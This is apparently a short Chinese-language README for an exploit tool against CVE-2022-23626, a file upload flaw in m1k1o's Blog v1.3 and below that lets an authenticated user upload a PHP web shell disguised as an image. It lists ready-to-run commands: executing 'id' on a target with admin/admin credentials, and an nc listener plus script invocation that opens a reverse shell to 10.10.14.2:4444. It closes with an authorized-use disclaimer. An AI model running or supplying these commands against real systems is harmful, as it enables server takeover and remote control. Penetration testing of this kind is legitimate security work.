通过 m1k1o的博客 v1.3 及以下版本中的文件上传漏洞实现认证远程代码执行。
ajax.php?action=upload_image 端点未能正确验证上传的文件类型,允许已认证用户上传伪装成图片的 PHP 网页后门。攻击者随后可通过直接请求上传的文件来触发执行。
requests 库pip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
先启动监听:
nc -lnvp 4444
然后运行:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
此工具仅用于授权的安全测试和教育目的。请仅在获得明确许可的系统上使用。